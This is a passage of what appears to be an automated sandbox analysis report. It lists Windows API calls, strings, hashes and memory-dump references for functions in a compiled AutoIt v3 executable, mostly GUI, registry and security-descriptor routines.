                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                        • String ID: $AutoIt v3$DISPLAY$static
                                        • API String ID: 2211948467-2373415609
                                        • Opcode ID: 27ed1b493f8c4e2fb58c735dd5858f10d0ad5d92b41a9b4d440eb2f22a963085
                                        • Instruction ID: 744fd026a9276b437b130f7f452f994ac5827faa9c94d7b3e9029cabeb2ee588
                                        • Opcode Fuzzy Hash: 27ed1b493f8c4e2fb58c735dd5858f10d0ad5d92b41a9b4d440eb2f22a963085
                                        • Instruction Fuzzy Hash: 43027D75900209EFDB14DF64CC89EAE7BB9FB49710F148218F915AB6A1CB74AD41CFA0
                                        Function 001070D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetTextColor.GDI32(?,00000000), ref: 0010712F
                                        • GetSysColorBrush.USER32(0000000F), ref: 00107160
                                        • GetSysColor.USER32(0000000F), ref: 0010716C
                                        • SetBkColor.GDI32(?,000000FF), ref: 00107186
                                        • SelectObject.GDI32(?,?), ref: 00107195
                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 001071C0
                                        • GetSysColor.USER32(00000010), ref: 001071C8
                                        • CreateSolidBrush.GDI32(00000000), ref: 001071CF
                                        • FrameRect.USER32(?,?,00000000), ref: 001071DE
                                        • DeleteObject.GDI32(00000000), ref: 001071E5
                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00107230
                                        • FillRect.USER32(?,?,?), ref: 00107262
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00107284
                                          • Part of subcall function 001073E8: GetSysColor.USER32(00000012), ref: 00107421
                                          • Part of subcall function 001073E8: SetTextColor.GDI32(?,?), ref: 00107425
                                          • Part of subcall function 001073E8: GetSysColorBrush.USER32(0000000F), ref: 0010743B
                                          • Part of subcall function 001073E8: GetSysColor.USER32(0000000F), ref: 00107446
                                          • Part of subcall function 001073E8: GetSysColor.USER32(00000011), ref: 00107463
                                          • Part of subcall function 001073E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00107471
                                          • Part of subcall function 001073E8: SelectObject.GDI32(?,00000000), ref: 00107482
                                          • Part of subcall function 001073E8: SetBkColor.GDI32(?,00000000), ref: 0010748B
                                          • Part of subcall function 001073E8: SelectObject.GDI32(?,?), ref: 00107498
                                          • Part of subcall function 001073E8: InflateRect.USER32(?,000000FF,000000FF), ref: 001074B7
                                          • Part of subcall function 001073E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001074CE
                                          • Part of subcall function 001073E8: GetWindowLongW.USER32(00000000,000000F0), ref: 001074DB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                        • String ID:
                                        • API String ID: 4124339563-0
                                        • Opcode ID: a90553b4352e82dc61893a5abbdefbf1ea69a454799ed33c4a4bc254941441eb
                                        • Instruction ID: 4268cca0b5ed430c3d1e7cba945704a671df5e9a490d4de06abb9da9e9c20f10
                                        • Opcode Fuzzy Hash: a90553b4352e82dc61893a5abbdefbf1ea69a454799ed33c4a4bc254941441eb
                                        • Instruction Fuzzy Hash: 79A18F72508301EFD7119F60DC48A6BBBA9FB89320F104B19F9E2965E1D7B1E984CF91
                                        Function 00088D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DestroyWindow.USER32(?,?), ref: 00088E14
                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 000C6AC5
                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 000C6AFE
                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 000C6F43
                                          • Part of subcall function 00088F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00088BE8,?,00000000,?,?,?,?,00088BBA,00000000,?), ref: 00088FC5
                                        • SendMessageW.USER32(?,00001053), ref: 000C6F7F
                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 000C6F96
                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 000C6FAC
                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 000C6FB7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                        • String ID: 0
                                        • API String ID: 2760611726-4108050209
                                        • Opcode ID: 4c4d3152b8b13019ab742c9fe9056caab9d263bac3f7b7d9dd82e5a7d4520ae0
                                        • Instruction ID: 2ff12bca7e5c2579ebfe5ee28161b0dead926d0987f95ed7dad1ce741f36d9fe
                                        • Opcode Fuzzy Hash: 4c4d3152b8b13019ab742c9fe9056caab9d263bac3f7b7d9dd82e5a7d4520ae0
                                        • Instruction Fuzzy Hash: 5D129B38600201AFDB75DF14C888FAAB7E5FB49300F54856DF4858B662CB72AC92CF91
                                        Function 000F2711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DestroyWindow.USER32(00000000), ref: 000F273E
                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 000F286A
                                        • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 000F28A9
                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 000F28B9
                                        • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 000F2900
                                        • GetClientRect.USER32(00000000,?), ref: 000F290C
                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 000F2955
                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 000F2964
                                        • GetStockObject.GDI32(00000011), ref: 000F2974
                                        • SelectObject.GDI32(00000000,00000000), ref: 000F2978
                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 000F2988
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000F2991
                                        • DeleteDC.GDI32(00000000), ref: 000F299A
                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 000F29C6
                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 000F29DD
                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 000F2A1D
                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 000F2A31
                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 000F2A42
                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 000F2A77
                                        • GetStockObject.GDI32(00000011), ref: 000F2A82
                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 000F2A8D
                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 000F2A97
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                        • API String ID: 2910397461-517079104
                                        • Opcode ID: 3c73a53ebd97400e4b89b1ec3d1c5ef2f655cdf5f2993a0b59c312b8f398983d
                                        • Instruction ID: 8ecd975f8ffd4b879d9480910d1a41e4ac33ba51186e07235a87e2046a8f3de7
                                        • Opcode Fuzzy Hash: 3c73a53ebd97400e4b89b1ec3d1c5ef2f655cdf5f2993a0b59c312b8f398983d
                                        • Instruction Fuzzy Hash: 19B15E75A40209AFDB14DF68CC45FAE7BA9FB09710F008114FA14E76A1D7B4AD80CF94
                                        Function 000E4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 000E4AED
                                        • GetDriveTypeW.KERNEL32(?,0010CB68,?,\\.\,0010CC08), ref: 000E4BCA
                                        • SetErrorMode.KERNEL32(00000000,0010CB68,?,\\.\,0010CC08), ref: 000E4D36
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorMode$DriveType
                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                        • API String ID: 2907320926-4222207086
                                        • Opcode ID: cfa5e64e039998d1bb9f3d957ad34f71b9857361743823604c79c7740cbae77d
                                        • Instruction ID: 980e38a33151195e0229397cf89b996cc3e95876061b071d1b6cd0bb3ff6ff4d
                                        • Opcode Fuzzy Hash: cfa5e64e039998d1bb9f3d957ad34f71b9857361743823604c79c7740cbae77d
                                        • Instruction Fuzzy Hash: 4061AE30705285EFCBA4DF66CA829AC77E1AB04340F34C016F84ABB692DB76ED45DB51
                                        Function 001073E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSysColor.USER32(00000012), ref: 00107421
                                        • SetTextColor.GDI32(?,?), ref: 00107425
                                        • GetSysColorBrush.USER32(0000000F), ref: 0010743B
                                        • GetSysColor.USER32(0000000F), ref: 00107446
                                        • CreateSolidBrush.GDI32(?), ref: 0010744B
                                        • GetSysColor.USER32(00000011), ref: 00107463
                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00107471
                                        • SelectObject.GDI32(?,00000000), ref: 00107482
                                        • SetBkColor.GDI32(?,00000000), ref: 0010748B
                                        • SelectObject.GDI32(?,?), ref: 00107498
                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 001074B7
                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001074CE
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 001074DB
                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0010752A
                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00107554
                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00107572
                                        • DrawFocusRect.USER32(?,?), ref: 0010757D
                                        • GetSysColor.USER32(00000011), ref: 0010758E
                                        • SetTextColor.GDI32(?,00000000), ref: 00107596
                                        • DrawTextW.USER32(?,001070F5,000000FF,?,00000000), ref: 001075A8
                                        • SelectObject.GDI32(?,?), ref: 001075BF
                                        • DeleteObject.GDI32(?), ref: 001075CA
                                        • SelectObject.GDI32(?,?), ref: 001075D0
                                        • DeleteObject.GDI32(?), ref: 001075D5
                                        • SetTextColor.GDI32(?,?), ref: 001075DB
                                        • SetBkColor.GDI32(?,?), ref: 001075E5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                        • String ID:
                                        • API String ID: 1996641542-0
                                        • Opcode ID: f01e60e64d644848a7b2aa764b204204d4d3c4a3d970cedf28259f47dcec3cdb
                                        • Instruction ID: 2b3816afd33bbdbb6792ef2f413ef308c863c4baeac02df5e4313a4fc9577556
                                        • Opcode Fuzzy Hash: f01e60e64d644848a7b2aa764b204204d4d3c4a3d970cedf28259f47dcec3cdb
                                        • Instruction Fuzzy Hash: 61616C76D00218AFDB019FA4DC49AEE7FB9EB09320F114215F951AB2E1D7B1A980CF90
                                        Function 00100FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCursorPos.USER32(?), ref: 00101128
                                        • GetDesktopWindow.USER32 ref: 0010113D
                                        • GetWindowRect.USER32(00000000), ref: 00101144
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00101199
                                        • DestroyWindow.USER32(?), ref: 001011B9
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 001011ED
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0010120B
                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0010121D
                                        • SendMessageW.USER32(00000000,00000421,?,?), ref: 00101232
                                        • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00101245
                                        • IsWindowVisible.USER32(00000000), ref: 001012A1
                                        • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 001012BC
                                        • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 001012D0
                                        • GetWindowRect.USER32(00000000,?), ref: 001012E8
                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 0010130E
                                        • GetMonitorInfoW.USER32(00000000,?), ref: 00101328
                                        • CopyRect.USER32(?,?), ref: 0010133F
                                        • SendMessageW.USER32(00000000,00000412,00000000), ref: 001013AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                        • String ID: ($0$tooltips_class32
                                        • API String ID: 698492251-4156429822
                                        • Opcode ID: 9caa81127fb07fd708d532753e0bd7a56895f499d056e89d9b49fd8fd8a2e355
                                        • Instruction ID: 1223873b2397586a821562de9f01ae63f0a5cba2a10420c12dc865c42ff501c5
                                        • Opcode Fuzzy Hash: 9caa81127fb07fd708d532753e0bd7a56895f499d056e89d9b49fd8fd8a2e355
                                        • Instruction Fuzzy Hash: 58B17B71604341AFD714DF64C884BAABBE4FF88754F008918F9D99B2A2CBB5E844CF95
                                        Function 00088891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00088968
                                        • GetSystemMetrics.USER32(00000007), ref: 00088970
                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0008899B
                                        • GetSystemMetrics.USER32(00000008), ref: 000889A3
                                        • GetSystemMetrics.USER32(00000004), ref: 000889C8
                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 000889E5
                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 000889F5
                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00088A28
                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00088A3C
                                        • GetClientRect.USER32(00000000,000000FF), ref: 00088A5A
                                        • GetStockObject.GDI32(00000011), ref: 00088A76
                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00088A81
                                          • Part of subcall function 0008912D: GetCursorPos.USER32(?), ref: 00089141
                                          • Part of subcall function 0008912D: ScreenToClient.USER32(00000000,?), ref: 0008915E
                                          • Part of subcall function 0008912D: GetAsyncKeyState.USER32(00000001), ref: 00089183
                                          • Part of subcall function 0008912D: GetAsyncKeyState.USER32(00000002), ref: 0008919D
                                        • SetTimer.USER32(00000000,00000000,00000028,000890FC), ref: 00088AA8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                        • String ID: AutoIt v3 GUI
                                        • API String ID: 1458621304-248962490
                                        • Opcode ID: 7ab56b2af803778b7214792e4a83518f2b93566fdeabdd4304536db9ae666348
                                        • Instruction ID: 3d7e5d06ab51afb6a881e95b03993b7d87d3bbe202131fe8d6da88b98822573e
                                        • Opcode Fuzzy Hash: 7ab56b2af803778b7214792e4a83518f2b93566fdeabdd4304536db9ae666348
                                        • Instruction Fuzzy Hash: 8DB18F75A0020AEFDF24DF68CC45BAE7BB5FB48314F104229FA55A72A0DB71A881CF51
                                        Function 000D0D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 000D10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 000D1114
                                          • Part of subcall function 000D10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,000D0B9B,?,?,?), ref: 000D1120
                                          • Part of subcall function 000D10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,000D0B9B,?,?,?), ref: 000D112F
                                          • Part of subcall function 000D10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,000D0B9B,?,?,?), ref: 000D1136
                                          • Part of subcall function 000D10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 000D114D
                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 000D0DF5
                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 000D0E29
                                        • GetLengthSid.ADVAPI32(?), ref: 000D0E40
                                        • GetAce.ADVAPI32(?,00000000,?), ref: 000D0E7A
                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 000D0E96
                                        • GetLengthSid.ADVAPI32(?), ref: 000D0EAD
                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 000D0EB5
                                        • HeapAlloc.KERNEL32(00000000), ref: 000D0EBC
                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 000D0EDD
                                        • CopySid.ADVAPI32(00000000), ref: 000D0EE4
                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 000D0F13
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 000D0F35
                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 000D0F47
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000D0F6E
                                        • HeapFree.KERNEL32(00000000), ref: 000D0F75
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000D0F7E
                                        • HeapFree.KERNEL32(00000000), ref: 000D0F85
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000D0F8E
                                        • HeapFree.KERNEL32(00000000), ref: 000D0F95
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 000D0FA1
                                        • HeapFree.KERNEL32(00000000), ref: 000D0FA8
                                          • Part of subcall function 000D1193: GetProcessHeap.KERNEL32(00000008,000D0BB1,?,00000000,?,000D0BB1,?), ref: 000D11A1
                                          • Part of subcall function 000D1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,000D0BB1,?), ref: 000D11A8
                                          • Part of subcall function 000D1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,000D0BB1,?), ref: 000D11B7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                        • String ID:
                                        • API String ID: 4175595110-0
                                        • Opcode ID: da414dacd83755c064f68ec0a83a152aed9e6585a28ca4d964efb54534c051dc
                                        • Instruction ID: b6df776bd80b682c47bfc326190c1d6c2acda97d2f770b36e08de8a794dd7880
                                        • Opcode Fuzzy Hash: da414dacd83755c064f68ec0a83a152aed9e6585a28ca4d964efb54534c051dc
                                        • Instruction Fuzzy Hash: 25714C7290030AEBDF609FA5DC48BEEBBB8BF04310F144226F959A6691D7719945CFB0
                                        Function 000FC3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000FC4BD
                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,0010CC08,00000000,?,00000000,?,?), ref: 000FC544
                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 000FC5A4
                                        • _wcslen.LIBCMT ref: 000FC5F4
                                        • _wcslen.LIBCMT ref: 000FC66F
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 000FC6B2
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 000FC7C1
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 000FC84D
                                        • RegCloseKey.ADVAPI32(?), ref: 000FC881
                                        • RegCloseKey.ADVAPI32(00000000), ref: 000FC88E
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 000FC960
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                        • API String ID: 9721498-966354055
                                        • Opcode ID: 87a2221cd4ee21a4277b9211e03e56a6688d96cf458f97f7df0b301047447a75
                                        • Instruction ID: d068618572744a75956c6b530e196a2c6eda5839c659edaf65781be1b8861ba3
                                        • Opcode Fuzzy Hash: 87a2221cd4ee21a4277b9211e03e56a6688d96cf458f97f7df0b301047447a75
                                        • Instruction Fuzzy Hash: A812A9356046089FDB14DF24C882F6AB7E5EF88754F14885CF98A9B7A2CB35EC41CB85
                                        Function 0010091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CharUpperBuffW.USER32(?,?), ref: 001009C6
                                        • _wcslen.LIBCMT ref: 00100A01
                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00100A54
                                        • _wcslen.LIBCMT ref: 00100A8A
                                        • _wcslen.LIBCMT ref: 00100B06
                                        • _wcslen.LIBCMT ref: 00100B81
                                          • Part of subcall function 0008F9F2: _wcslen.LIBCMT ref: 0008F9FD
                                          • Part of subcall function 000D2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 000D2BFA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
